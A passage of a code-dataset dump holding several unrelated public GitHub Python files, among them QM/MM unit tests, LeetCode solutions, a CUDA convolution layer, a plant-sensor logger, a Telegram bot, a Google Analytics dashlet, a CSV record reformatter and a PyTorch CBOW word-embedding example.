np.allclose(np.array(ala_RC.link_atoms['all_outer_bonds'][1]), np.array([7, 8, 9]))\n assert np.allclose(np.array(ala_RC.link_atoms['all_outer_bonds'][0]), np.array([11, 12]))\n assert np.allclose(np.array(ala_RCD.link_atoms['all_outer_bonds'][0]), np.array([10, 6, 5]))\n assert len(np.array(ala_RCD.link_atoms['all_outer_bonds'][1])) == 0\n\ndef test_get_redistributed_positions():\n\n positions = sys_ala_RC.entire_sys['positions']\n pos1 = ala_RC.get_redistributed_positions(positions, ala_RC.link_atoms['all_outer_bonds'][0], ala_RC.link_atoms['all_mm'][0])\n pos2 = ala_RC.get_redistributed_positions(positions, [], ala_RC.link_atoms['all_mm'][0])\n \n pos = np.array([[ 0.15875, 0.2052 , -0.00825],\n [ 0.26225001, 0.1605, -0.0083]])\n\n assert len(pos2) == 0\n assert np.allclose(np.array(pos1), pos)\n\ndef test_get_external_charges():\n\n charges_mech = mech.get_external_charges(sys_mech)\n charges_ala_link = ala_link.get_external_charges(sys_ala_link)\n charges_ala_RC = ala_RC.get_external_charges(sys_ala_RC)\n charges_ala_RCD = ala_RCD.get_external_charges(sys_ala_RCD)\n \n assert charges_mech is None\n assert len(charges_ala_link) == 29\n assert len(charges_ala_RC) == 30\n assert len(charges_ala_RCD) == 31\n\ndef test_make_primary_subsys_trajectory():\n\n traj_mech, link_mech = mech.make_primary_subsys_trajectory()\n traj_ala, link_ala = ala_RC.make_primary_subsys_trajectory(qm_atoms=sys_ala_RC.qm_atoms)\n\n mech.traj_ps = traj_mech\n ala_RC.traj_ps = traj_ala\n\n assert len(link_mech) == 0\n assert len(link_ala) == 2\n assert len(traj_mech.xyz[0]) == 3\n assert len(traj_ala.xyz[0]) == 8\n \ndef test_make_second_subsys_trajectory():\n\n traj_mech = mech.make_second_subsys_trajectory()\n traj_ala = ala_RC.make_second_subsys_trajectory(qm_atoms=sys_ala_RC.qm_atoms)\n \n assert len(traj_mech.xyz[0]) ==6\n assert len(traj_ala.xyz[0]) == 27\n\n\ndef test_mechanical():\n mech.mechanical(sys_mech, main_info_m)\n ala_link.mechanical(sys_ala_link, main_info_ala)\n \n assert len(sys_mech.qmmm_forces) == 3\n assert len(sys_ala_link.qmmm_forces) == 5\n\n assert np.allclose(sys_mech.entire_sys['energy'], -0.010569627400199556 )\n assert np.allclose(sys_mech.primary_subsys['ll']['energy'], 4.0884494790050603e-07)\n assert np.allclose(sys_mech.primary_subsys['hl']['energy'], -74.96297372571573)\n assert np.allclose(sys_ala_link.entire_sys['energy'], 0.01606083465900136)\n assert np.allclose(sys_ala_link.primary_subsys['ll']['energy'], 0.024946918087355077)\n assert np.allclose(sys_ala_link.primary_subsys['hl']['energy'], -55.86812550986576)\n\ndef test_electrostatic():\n #ala_link.electrostatic(sys_ala_link, main_info_ala)\n #ala_RCD.electrostatic(sys_ala_RCD, main_info_ala)\n elec.electrostatic(sys_elec, main_info_e)\n \n assert len(sys_elec.qmmm_forces) == 9\n assert np.allclose(sys_elec.entire_sys['energy'], -0.010569627400199556)\n assert np.allclose(sys_elec.primary_subsys['ll']['energy'], 4.0884494790050603e-07)\n assert np.allclose(sys_elec.second_subsys['ll']['energy'],8.553464518012368e-05 )\n assert np.allclose(sys_elec.primary_subsys['hl']['energy'], -74.97080694971332)\n\n\ndef test_update_traj():\n\n mech.traj.xyz[0] = np.zeros((9,3))\n pos1 = mech.traj.xyz[0]\n mech.update_traj(main_info_m['positions'], main_info_m['topology'], 'OpenMM')\n \n assert np.allclose(pos1, np.zeros((9,3)))\n assert np.allclose(mech.traj.xyz[0], main_info_m['positions'])\n \ndef test_run_qmmm():\n mech.qm_atoms = [0,1,2]\n ala_link.qm_atoms = [0,1,2,3]\n\n mech.run_qmmm(main_info_m, 'OpenMM')\n 
ala_link.run_qmmm(main_info_ala, 'OpenMM')\n\n assert 'qm' in mech.systems[0]\n assert 'qm' in ala_link.systems[0]\n assert len(mech.systems[0]['qmmm_forces']) == 3\n assert len(ala_link.systems[0]['qmmm_forces']) == 33\n assert np.allclose(mech.systems[0]['qmmm_energy'],-74.98137698595846)\n assert np.allclose(ala_link.systems[0]['qmmm_energy'],-55.809616706920814)\n assert mech.run_ID == 1\n assert ala_link.run_ID == 1\n \n\ndef test_get_forces():\n f_mech = mech.get_forces()\n f_link = ala_link.get_forces()\n\n assert len(f_mech) == 3\n assert len(f_link) == 33\n\n\n#def test_compute_gradients():\n# pass in a system with gradients \n # tested in mechanical and electrostatic, but need for RCD testing\n","repo_name":"CCQC/janus","sub_path":"tests/test_qmmm.py","file_name":"test_qmmm.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"} +{"seq_id":"25003120416","text":"from typing import List\n\n\ndef maxAreaOfIsland(grid: List[List[int]]) -> int:\n rows, columns = len(grid), len(grid[0])\n visited = set()\n maxArea = 0\n\n def dfs(r, c):\n if r < 0 or c < 0 or r >= rows or c >= columns or grid[r][c] == 0 or (r,c) in visited:\n return 0\n\n visited.add((r, c))\n \n return 1 + dfs(r+1, c) + dfs(r-1, c) + dfs(r, c+1) + dfs(r, c-1)\n\n for r in range(rows):\n for c in range(columns):\n maxArea = max(maxArea, dfs(r, c))\n\n return maxArea","repo_name":"RiadSaidur/python-practice","sub_path":"leetcode/algorithms/bfs-dfs/695. Max Area of Island.py","file_name":"695. Max Area of Island.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1878570549","text":"import numpy as np\nimport numba\nfrom numba import cuda\n\n\n@cuda.jit()\ndef cal_cov_gradient(inputs, weights, gradient_loss_to_this_outputs, g_weights, g_biases, g_inputs):\n tx = cuda.threadIdx.x\n ty = cuda.threadIdx.y\n f_num = cuda.blockIdx.x\n\n for n in range(gradient_loss_to_this_outputs.shape[0]):\n for i in range(weights.shape[1]):\n for j in range(weights.shape[2]):\n for k in range(weights.shape[3]):\n tmp1 = gradient_loss_to_this_outputs[n,\n tx, ty, f_num] * weights[f_num, i, j, k]\n tmp2 = gradient_loss_to_this_outputs[n,\n tx, ty, f_num] * inputs[n, tx+i, ty+j, k]\n g_inputs[n, tx+i, ty+j, k] += tmp1\n g_weights[f_num, i, j, k] += tmp2\n g_biases[f_num] += gradient_loss_to_this_outputs[n, tx, ty, f_num]\n\n\n@cuda.jit()\ndef cov(inputs, weights, biases, outputs):\n tx = cuda.threadIdx.x\n ty = cuda.threadIdx.y\n f_num = cuda.blockIdx.x\n\n for n in range(inputs.shape[0]):\n for i in range(weights.shape[1]):\n for j in range(weights.shape[2]):\n for k in range(weights.shape[3]):\n outputs[n, tx, ty, f_num] += (\n inputs[n, tx + i, ty + j, k] * weights[f_num, i, j, k])\n outputs[n, tx, ty, f_num] += biases[f_num]\n\n\nclass Conv2D(object):\n def __init__(self, in_channels, kernel_size, features):\n self.features = features\n self.ksize = kernel_size\n weights_scale = np.sqrt(kernel_size * kernel_size * in_channels / 2)\n self.weights = np.random.standard_normal(\n (features, kernel_size, kernel_size, in_channels)) / weights_scale\n self.biases = np.random.standard_normal(features) / weights_scale\n\n self.g_weights = None\n self.g_biases = None\n self.g_inputs = None\n self.inputs = None\n self.outputs = None\n\n def forward(self, inputs):\n self.inputs = np.zeros(shape=(inputs.shape[0], inputs.shape[1]+(self.ksize // 2)*2,\n 
inputs.shape[2] + (self.ksize // 2)*2, inputs.shape[3]), dtype=np.float32)\n self.inputs[:, self.ksize // 2: inputs.shape[1] + self.ksize // 2,\n self.ksize // 2: inputs.shape[2] + self.ksize // 2, :] = inputs.copy()\n self.outputs = np.zeros(shape=(\n inputs.shape[0], inputs.shape[1], inputs.shape[2], self.features), dtype=np.float32)\n grid = (self.features)\n block = (inputs.shape[1], inputs.shape[2])\n cov[grid, block](self.inputs, self.weights, self.biases, self.outputs)\n return self.outputs\n\n def backward(self, gradient_loss_to_this_outputs):\n self.g_inputs = np.zeros(shape=self.inputs.shape, dtype=np.float32)\n self.g_weights = np.zeros(self.weights.shape, dtype=np.float32)\n self.g_biases = np.zeros(self.biases.shape, dtype=np.float32)\n grid = (self.features)\n block = (self.inputs.shape[1], self.inputs.shape[2])\n cal_cov_gradient[grid, block](self.inputs, self.weights, gradient_loss_to_this_outputs,\n self.g_weights, self.g_biases, self.g_inputs)\n\n self.g_inputs = self.g_inputs[:, self.ksize//2: self.g_inputs.shape[1] - self.ksize//2,\n self.ksize//2: self.g_inputs.shape[2] - self.ksize//2, :]\n return self.g_inputs\n\n def update_parameters(self, lr):\n self.weights -= self.g_weights * lr / self.inputs.shape[0]\n self.biases -= self.g_biases * lr / self.inputs.shape[0]\n","repo_name":"HuynhCo111999/HandwrittenRecognitionParallel","sub_path":"Parallel/conv2d.py","file_name":"conv2d.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37736916055","text":"import digitalio, analogio\nimport board\nimport busio\nimport time\nimport adafruit_sdcard\nimport adafruit_dht\nimport storage\nimport adafruit_pcf8523\nimport gc\nimport sys\nfrom adafruit_seesaw.seesaw import Seesaw\nfrom clock import rtc,i2c\n\ngc.enable()\n\n# initialize and mount the SD card\ndef mount_SD():\n spi= busio .SPI ( board .SCK , board .MOSI , board . MISO )\n cs= digitalio . DigitalInOut ( board . D10)\n sdcard = adafruit_sdcard . SDCard (spi , cs)\n vfs= storage . VfsFat ( sdcard )\n storage . 
mount (vfs , \"/sd\")\n\n#initialize humidity & temperature sensor\ndef get_DHT(dht_pin):\n return adafruit_dht.DHT22(dht_pin)\n\ndef get_soil_sensor(i2c):\n return Seesaw(i2c, addr = 0x36)\n\n#get photocell\ndef get_photocell(photocell_pin):\n return analogio.AnalogIn(photocell_pin)\n\ndef init_leds():\n\n yellow = digitalio.DigitalInOut(board.D6)\n blue = digitalio.DigitalInOut(board.D9)\n green = digitalio.DigitalInOut(board.D11)\n red = digitalio.DigitalInOut(board.D12)\n yellow.direction = digitalio.Direction.OUTPUT\n blue.direction = digitalio.Direction.OUTPUT\n green.direction = digitalio.Direction.OUTPUT\n red.direction = digitalio.Direction.OUTPUT\n\n return yellow, blue, green, red\n\n#get analogue voltage\ndef analog_voltage (adc):\n return (adc.value / 65535 * adc.reference_voltage)\n\n#calibrates all sensors\ndef calibrate_sensors():\n print('\\n\\nsensors calibrated\\n\\n')\n\ndef correct_humidity():\n print('\\nmisting air with water to correct humidity\\n')\n for blink in range(2):\n yellow.value = True\n time.sleep(.05)\n yellow.value = False\n time.sleep(.05)\ndef correct_moisture():\n print('\\nwatering plants to increase soil moisture\\n')\n for blink in range(2):\n blue.value = True\n time.sleep(.05)\n blue.value = False\n time.sleep(.05)\ndef correct_temperature():\n print('\\nTemperature is off; adjust climate control\\n')\n for blink in range(2):\n green.value = True\n time.sleep(.05)\n green.value = False\n time.sleep(.05)\n\n#returns list of current values\ndef log_values(t,dht,photocell,soil):\n t_abs = rtc.datetime\n date = str (t_abs.tm_mday) + '/' + str(t_abs.tm_mon) + '/' + str(t_abs.tm_year)\n times = str(t_abs.tm_hour) + ':' + str(t_abs.tm_min) + ':' + str(t)\n\n air_temp = dht.temperature\n humidity = dht.humidity\n photo_val = photocell.value\n volts = analog_voltage(photocell)\n moisture = moisture_to_percent(soil.moisture_read())\n soil_temp = 1 # soil.get_temp()\n\n return (date,times,humidity,moisture,air_temp,soil_temp,photo_val,volts)\n\n# checks latest reading for values out of tolerance regions\ndef check_log(log,POS,flowering):\n bounds = [(65,85),(.2,.3),(21.1,26.8)] # tolerance region for humidity, moisture, and air temp\n if flowering:\n bounds[0] = (50,65)\n flags = [False for _ in range(3)]\n for pos in range(len(flags)):\n if pos == 1:\n if log[pos+2]bounds[pos][1]:\n flags[pos] = True\n return tuple(flags)\n\ndef print_log(log, POS):\n print_str = ''\n for data,label in zip(log,POS):\n if label is 'humidity':\n print_str += label + ': ' + str(data) + '% ; '\n elif label is 'moisture':\n print_str += label + ': {:.1f}% ; '.format(data*100)\n else:\n print_str += label + ': ' + str(data) + ' ; '\n return print_str\n\n\ndef cross_check(flags_log):\n try:\n match = [(c and l) for c,l in zip(flags_log[-1],flags_log[-2])]\n except Exception as e:\n print('could not get two previous flag logs')\n\n if match[0] and not match[1]:\n correct_humidity()\n if match[1]:\n correct_moisture()\n if match[2]:\n correct_temperature()\n\n#returns the past moisture reading where r is how many readings back is returned\ndef get_past_moisture(logs,POS, r = 1):\n try:\n return logs[-1*(1+r)][POS['moisture']]\n except Exception as e:\n print('error in get_past_moisture():\\n' + str(e))\n#returns the percent moisture\ndef moisture_to_percent(moisture):\n percent = ((moisture - 200)/1800)\n print('{:.1f}% moisture'.format(percent*100))\n return percent\n\nmount_SD()\ndht = get_DHT(board.D5)\nsoil = get_soil_sensor(i2c)\nphotocell = get_photocell(board.A1)\nPOS = 
('date', 'time', 'humidity', 'moisture', 'air temp',\n 'soil temp', 'photo val', 'volts') #position of various data in logs\nlogs = []\nflags_log = [] #record of past flag logs\nmax_len = 50 #maximum length for logs until older entries are overwritten\nyellow,blue,green,red = init_leds()\npopped = False\ntime_not_up = True\nflowering = False\nrun_time = 30 #runtime in seconds\nti = rtc.datetime[5]\n\nwith open(\"/sd/results.txt\", \"w\") as f:\n while time_not_up:\n t = rtc.datetime[5]-ti\n if t % 5 == 0: #setting the interval for sensor calibration\n calibrate_sensors()\n\n if t % 2 == 0: #setting the interval for logging data\n current_log = log_values(t,dht,photocell,soil)\n if len(logs) < max_len:\n logs.append(current_log)\n else:\n logs.pop(0)\n logs.append(current_log)\n\n current_flags = check_log(current_log, POS, flowering)\n\n if len(flags_log) >= max_len:\n if not popped:\n f.write('\\n\\npopping oldest reading\\n\\n')\n flags_log.pop(0)\n popped = True\n\n flags_log.append(current_flags)\n if len(flags_log)>1:\n cross_check(flags_log)\n\n print_log(current_log,POS)\n f.write('run time is ' + str(t) + ' seconds:\\n ' + print_log(current_log,POS) + '\\n')\n\n if t >= run_time:\n time_not_up = False\n print('\\n\\nruntime is complete\\n\\n')\n else:\n time.sleep(1)","repo_name":"ENGR-133-Group-7/algorithms","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33759535858","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020/8/13 9:06\n @Author : QDY\n @FileName: 129. 求根到叶子节点数字之和.py\n @Software: PyCharm\n\"\"\"\n\"\"\"\n 给定一个二叉树,它的每个结点都存放一个0-9的数字,每条从根到叶子节点的路径都代表一个数字。\n 例如,从根到叶子节点路径 1->2->3 代表数字 123。\n 计算从根到叶子节点生成的所有数字之和。\n 说明:叶子节点是指没有子节点的节点。\n \n 示例 1:\n 输入: [1,2,3]\n 1\n / \\\n 2 3\n 输出: 25\n 解释:\n 从根到叶子节点路径 1->2 代表数字 12.\n 从根到叶子节点路径 1->3 代表数字 13.\n 因此,数字总和 = 12 + 13 = 25.\n \n 示例 2:\n 输入: [4,9,0,5,1]\n 4\n / \\\n 9 0\n / \\\n 5 1\n 输出: 1026\n 解释:\n 从根到叶子节点路径 4->9->5 代表数字 495.\n 从根到叶子节点路径 4->9->1 代表数字 491.\n 从根到叶子节点路径 4->0 代表数字 40.\n 因此,数字总和 = 495 + 491 + 40 = 1026.\n\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def sumNumbers(self, root) -> int:\n if not root: return 0\n self.res = 0\n\n def dfs(cur, node):\n cur = cur * 10 + node.val\n if not node.left and not node.right:\n self.res += cur\n return\n if node.left:\n dfs(cur, node.left)\n if node.right:\n dfs(cur, node.right)\n\n dfs(0, root)\n return self.res\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/129. 求根到叶子节点数字之和.py","file_name":"129. 
求根到叶子节点数字之和.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24226686889","text":"#!/usr/bin/env python3\n\"\"\"Transparent \"dashlet\" rendering Google Analytics data.\"\"\"\n\nimport httplib2\nimport argparse\nimport cairo\nimport gi\n\ngi.require_version('Gtk', '3.0')\n\nfrom gi.repository import GLib, Gtk, Gdk\nfrom apiclient.discovery import build\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom oauth2client import client, file, tools\n\ndef get_service(api_name, api_version, scope, key_file_location):\n \"\"\"Get a service that communicates to a Google API.\n\n Args:\n api_name: The name of the api to connect to.\n api_version: The api version to connect to.\n scope: A list auth scopes to authorize for the application.\n key_file_location: The path to a valid service account JSON key file.\n\n Returns:\n A service that is connected to the specified API.\n \"\"\"\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n key_file_location, scopes=scope)\n\n # Build the service object.\n service = build(api_name, api_version, credentials=credentials)\n\n return service\n\n\ndef get_first_profile_id(service):\n # Use the Analytics service object to get the first profile id.\n\n # Get a list of all Google Analytics accounts for this user\n accounts = service.management().accounts().list().execute()\n\n if accounts.get('items'):\n # Get the first Google Analytics account.\n account = accounts.get('items')[0].get('id')\n\n # Get a list of all the properties for the first account.\n properties = service.management().webproperties().list(\n accountId=account).execute()\n\n if properties.get('items'):\n # Get the first property id.\n property = properties.get('items')[0].get('id')\n\n # Get a list of all views (profiles) for the first property.\n profiles = service.management().profiles().list(\n accountId=account,\n webPropertyId=property).execute()\n\n if profiles.get('items'):\n # return the first view (profile) id.\n return profiles.get('items')[0].get('id')\n\n return None\n\n\ndef get_results(service, profile_id):\n results = {}\n results['week'] = service.data().ga().get(\n ids='ga:' + profile_id,\n start_date='7daysAgo',\n end_date='today',\n metrics='ga:pageviews,ga:adsenseRevenue').execute()\n results['yesterday'] = service.data().ga().get(\n ids='ga:' + profile_id,\n start_date='yesterday',\n end_date='yesterday',\n metrics='ga:pageviews,ga:adsenseRevenue').execute()\n results['today'] = service.data().ga().get(\n ids='ga:' + profile_id,\n start_date='today',\n end_date='today',\n metrics='ga:pageviews,ga:adsenseRevenue').execute()\n return results\n\ndef ga_auth():\n key_file_location = 'client_secrets.json'\n service = get_service('analytics', 'v3', ['https://www.googleapis.com/auth/analytics.readonly'], key_file_location)\n profile = get_first_profile_id(service)\n return (service, profile)\n\ndef ga_fetch(service, profile):\n return get_results(service, profile)\n\nclass MyWin (Gtk.Window):\n def __init__(self):\n super(MyWin, self).__init__()\n self.set_position(Gtk.WindowPosition.CENTER)\n\n self.set_size_request(300, 70)\n self.set_border_width(10)\n self.restore_position()\n\n self.screen = self.get_screen()\n self.visual = self.screen.get_rgba_visual()\n if self.visual != None and self.screen.is_composited():\n self.set_visual(self.visual)\n else:\n print(\"Sorry, your screen is not composite! 
Transparency won't work.\")\n\n self.set_app_paintable(True)\n self.connect(\"draw\", self.area_draw)\n self.connect(\"window-state-event\", self.window_state_event_cb)\n\n self.show_all()\n self.set_decorated(False)\n self.get_window().set_decorations(Gdk.WMDecoration.BORDER)\n self.get_window().set_type_hint(Gdk.WindowTypeHint.UTILITY)\n self.set_skip_taskbar_hint(True)\n self.set_skip_pager_hint(True)\n\n (self.service, self.profile) = ga_auth()\n self.update(None)\n GLib.timeout_add_seconds(30, self.update, None)\n\n def get_config_file(self):\n path = GLib.build_pathv('/', (GLib.get_user_config_dir(), 'ga-dashlet', None))\n GLib.mkdir_with_parents(path, 0o700)\n return GLib.build_filenamev((path, 'settings.ini'))\n\n def restore_position(self):\n try:\n k = GLib.KeyFile.new()\n k.load_from_file(self.get_config_file(), GLib.KeyFileFlags.NONE)\n self.x = k.get_integer('window', 'x')\n self.y = k.get_integer('window', 'y')\n self.move(self.x, self.y)\n except:\n print(\"Cannot restore position\")\n\n def save_position(self, x, y):\n k = GLib.KeyFile.new()\n k.set_integer('window', 'x', x)\n k.set_integer('window', 'y', y)\n k.save_to_file(self.get_config_file())\n\n def window_state_event_cb(self, widget, event):\n (x, y) = self.get_window().get_position()\n if self.x != x or self.y != y:\n self.x = x\n self.y = y\n self.save_position(x, y)\n\n def update(self, user_data):\n self.data = ga_fetch(self.service, self.profile)\n Gtk.Widget.queue_draw_area(self, 0, 0, 300, 70)\n return True\n\n def area_draw(self, widget, cr):\n cr.set_source_rgba(.2, .2, .2, 0.5)\n cr.set_operator(cairo.OPERATOR_SOURCE)\n cr.paint()\n cr.set_operator(cairo.OPERATOR_OVER)\n\n # Draw text + numbers\n cr.select_font_face(\"Monospace\",\n cairo.FONT_SLANT_NORMAL,\n cairo.FONT_WEIGHT_NORMAL);\n cr.set_source_rgba(1, 1, 1, 1)\n cr.set_font_size(11);\n cr.move_to(12, 20);\n cr.show_text(self.data['today'].get('profileInfo').get('profileName'))\n\n cr.set_source_rgba(0.9, 0.9, 0.9, 1)\n cr.move_to(18, 38);\n cr.show_text(\"Today %6s Views %03.2f EUR\" % (\n self.data['today'].get('rows')[0][0],\n float(self.data['today'].get('rows')[0][1])))\n cr.move_to(18, 52);\n cr.show_text(\"Yesterday %6s Views %03.2f EUR\" % (\n self.data['yesterday'].get('rows')[0][0],\n float(self.data['yesterday'].get('rows')[0][1])))\n cr.move_to(18, 66);\n cr.show_text(\"Last 7days %6s Views %03.2f EUR\" % (\n self.data['week'].get('rows')[0][0],\n float(self.data['week'].get('rows')[0][1])))\n\nif __name__ == '__main__':\n import signal\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n MyWin()\n Gtk.main()\n\n# ex:ts=4:et:\n","repo_name":"lwindolf/ga-dashlet","sub_path":"ga-dashlet.py","file_name":"ga-dashlet.py","file_ext":"py","file_size_in_byte":6222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"711707729","text":"import os\nimport csv\nimport datetime\n\nstates = {\n 'Utah' : 'UT' ,\n 'North Carolina' : 'NC' ,\n 'Arizona' : 'AZ' ,\n 'Virgin Islands' : 'VI' ,\n 'Kentucky' : 'KY' ,\n 'Minnesota' : 'MN' ,\n 'New Hampshire' : 'NH' ,\n 'Maine' : 'ME' ,\n 'Alaska' : 'AK' ,\n 'Texas' : 'TX' ,\n 'New York' : 'NY' ,\n 'Arkansas' : 'AR' ,\n 'Delaware' : 'DE' ,\n 'Indiana' : 'IN' ,\n 'New Jersey' : 'NJ' ,\n 'West Virginia' : 'WV' ,\n 'Wisconsin' : 'WI' ,\n 'Kansas' : 'KS' ,\n 'Alabama' : 'AL' ,\n 'Florida' : 'FL' ,\n 'Ohio' : 'OH' ,\n 'District of Columbia' : 'DC' ,\n 'California' : 'CA' ,\n 'Northern Mariana Islands' : 'MP' ,\n 'National' : 'NA' ,\n 'Georgia' : 'GA' ,\n 'Missouri' 
: 'MO' ,\n 'Vermont' : 'VT' ,\n 'Massachusetts' : 'MA' ,\n 'Oklahoma' : 'OK' ,\n 'South Carolina' : 'SC' ,\n 'Montana' : 'MT' ,\n 'Mississippi' : 'MS' ,\n 'North Dakota' : 'ND' ,\n 'Illinois' : 'IL' ,\n 'Puerto Rico' : 'PR' ,\n 'Nebraska' : 'NE' ,\n 'Pennsylvania' : 'PA' ,\n 'Oregon' : 'OR' ,\n 'Colorado' : 'CO' ,\n 'Guam' : 'GU' ,\n 'South Dakota' : 'SD' ,\n 'Washington' : 'WA' ,\n 'Virginia' : 'VA' ,\n 'Connecticut' : 'CT' ,\n 'Rhode Island' : 'RI' ,\n 'Hawaii' : 'HI' ,\n 'American Samoa' : 'AS' ,\n 'Michigan' : 'MI' ,\n 'Iowa' : 'IA' ,\n 'Idaho' : 'ID' ,\n 'Maryland' : 'MD' ,\n 'Wyoming' : 'WY' ,\n 'Louisiana' : 'LA' ,\n 'Tennessee' : 'TN' ,\n 'Nevada' : 'NV' ,\n 'New Mexico' : 'NM' \n}\n\ndef parse_a_row(row):\n #check for header and ignore it\n ID, Name, DOB, SSN, State = row\n if ID == 'Emp ID':\n return None\n #Name has format of : John Doe\n first_name, last_name = Name.split(' ')\n #DOB has format of YYYY-MM-DD\n # split YYYY, MM and DD, then use map to convert to integers, convert the result to a list\n #finally use * to feed the list to datetime.date element-wise\n dob = datetime.date( *list(map(int,DOB.split('-')) ) )\n #now convert dob to the desired format\n dob = dob.strftime(\"%m/%d/%y\")\n #hide first 5 numbers of sss and just grab las four\n ssn = '***-**-' + SSN.split('-')[-1]\n return ID, first_name, last_name, dob, ssn, states[State]\n\n#Get a list of all data files to read located in folder 'data'\nall_files = os.listdir('data')\n\n#Open an output file to gather our results\noutfile = open(os.path.join('output','new_records.csv'), 'w', newline='')\n#Add a csv writer\ncsv_writer = csv.writer(outfile, delimiter=',')\n#add header\ncsv_writer.writerow(['Emp ID', 'First Name', 'Last Name', 'DOB', 'SSN', 'State'])\n\n#Loop over all files to parse\nfor afile in all_files:\n #Need to add the path to file before we open it\n afile = os.path.join('data',afile)\n if afile.endswith('csv'):\n #Analyze file here\n with open(afile, 'r', newline='') as infile:\n csv_reader = csv.reader(infile, delimiter=',')\n for row in csv_reader:\n parsed_row = parse_a_row(row)\n #check for header here \n if parsed_row:\n csv_writer.writerow(parsed_row)\n#Close outpuf file\noutfile.close()\n","repo_name":"alandavila/python-challenge","sub_path":"PyBoss/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24283924772","text":"from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, filters\nfrom telegram.ext import MessageHandler\nimport text_effects\nfrom dotenv import load_dotenv\nimport os\nimport random\n\nload_dotenv()\nTOKEN = os.environ[\"TOKEN\"]\n\n\nwith open(\"stopwords-ru.txt\") as f:\n STOP_WORDS = f.read().split()\nSTOP_WORDS = set(STOP_WORDS)\n\n\ndef hello(update: Update, context: CallbackContext) -> None:\n \"\"\"Greet user saying /hello\"\"\"\n update.message.reply_text(f\"Hello {update.effective_user.first_name}\")\n\n\ndef help(update: Update, context: CallbackContext) -> None:\n \"\"\"Description of all commands\"\"\"\n commands_with_descriptions = []\n for handler_list in updater.dispatcher.handlers.values():\n for handler in handler_list:\n if isinstance(handler, CommandHandler):\n command_repr = \"\\n\".join([\"/\" + comm for comm in handler.command])\n docstring = handler.callback.__doc__\n commands_with_descriptions.append(command_repr + \"\\n\" + text_effects.italics(docstring))\n delimiter = \"\\n\" + 
text_effects.bold(\"=\" * 32) + \"\\n\"\n update.message.reply_markdown_v2(delimiter.join(commands_with_descriptions))\n\n\ndef what_is(update: Update, context: CallbackContext) -> None:\n text: str = update.message.text\n word_to_choose_from = set(text.split()) - STOP_WORDS\n if len(word_to_choose_from) == 0:\n answer = \"В чем смысл жизни?\"\n else:\n word = random.choice(list(word_to_choose_from))\n answer = f\"Что такое {word}?\"\n update.message.reply_text(answer)\n\n\nupdater = Updater(token=TOKEN)\n\nupdater.dispatcher.add_handler(CommandHandler('hello', hello))\nupdater.dispatcher.add_handler(CommandHandler('help', help))\nupdater.dispatcher.add_handler(\n MessageHandler(\n filters=(filters.Filters.text & ~filters.Filters.command),\n callback=what_is\n )\n)\n\nupdater.start_polling()\nupdater.idle()\n","repo_name":"iakremnev/mkn_2022_python_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19730249828","text":"'''\npy3.5\npytorch0.4.1\n@smx\n\nC-BOW\nThe CBOW model is as follows. Given a target word wi and an N context window on each side, wi−1,…,wi−N and wi+1,…,wi+N,\n用周围的词wi-1,wi+1 预测中间的词wi\n'''\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\n\n# create your model and train. here are some functions to help you make\n# the data ready for use by your module\nclass CBOW(nn.Module):\n def __init__(self, vocab_size, embedding_dim, context_size):\n super(CBOW, self).__init__()\n self.embeddings = nn.Embedding(vocab_size, embedding_dim)\n self.linear1 = nn.Linear(context_size * embedding_dim, 128)\n self.linear2 = nn.Linear(128, vocab_size)\n\n def forward(self, inputs):\n embeds = self.embeddings(inputs).view((1, -1))\n out = F.relu(self.linear1(embeds))\n out = self.linear2(out)\n log_probs = F.log_softmax(out, dim=1)\n return log_probs\n\ndef make_context_vector(context, word_to_ix):\n idxs = [word_to_ix[w] for w in context]\n return torch.tensor(idxs, dtype=torch.long)\n\nEMBEDDING_DIM =10\nCONTEXT_SIZE = 4 # 2 words to the left, 2 to the right\nraw_text = \"\"\"We are about to study the idea of a computational process.\nComputational processes are abstract beings that inhabit computers.\nAs they evolve, processes manipulate other abstract things called data.\nThe evolution of a process is directed by a pattern of rules\ncalled a program. People create programs to direct processes. In effect,\nwe conjure the spirits of the computer with our spells.\"\"\".split()\n\n# By deriving a set from `raw_text`, we deduplicate the array\nvocab = set(raw_text)\nvocab_size = len(vocab)\n\nword_to_ix = {word: i for i, word in enumerate(vocab)}\nid_to_word = {word_to_ix[word]:word for word in word_to_ix}\ndata = []\nfor i in range(2, len(raw_text) - 2):\n context = [raw_text[i - 2], raw_text[i - 1],\n raw_text[i + 1], raw_text[i + 2]]\n target = raw_text[i]\n data.append((context, target))\nprint(data[:5])\n\n\nlosses = []\nloss_function = nn.NLLLoss()\nmodel = CBOW(len(vocab), EMBEDDING_DIM, CONTEXT_SIZE)\noptimizer = optim.SGD(model.parameters(), lr=0.1)\n\nfor epoch in range(10):\n total_loss = 0\n for context, target in data:\n\n # Step 1. Prepare the inputs to be passed to the model (i.e, turn the words\n # into integer indices and wrap them in tensors)\n context_idxs = torch.tensor([word_to_ix[w] for 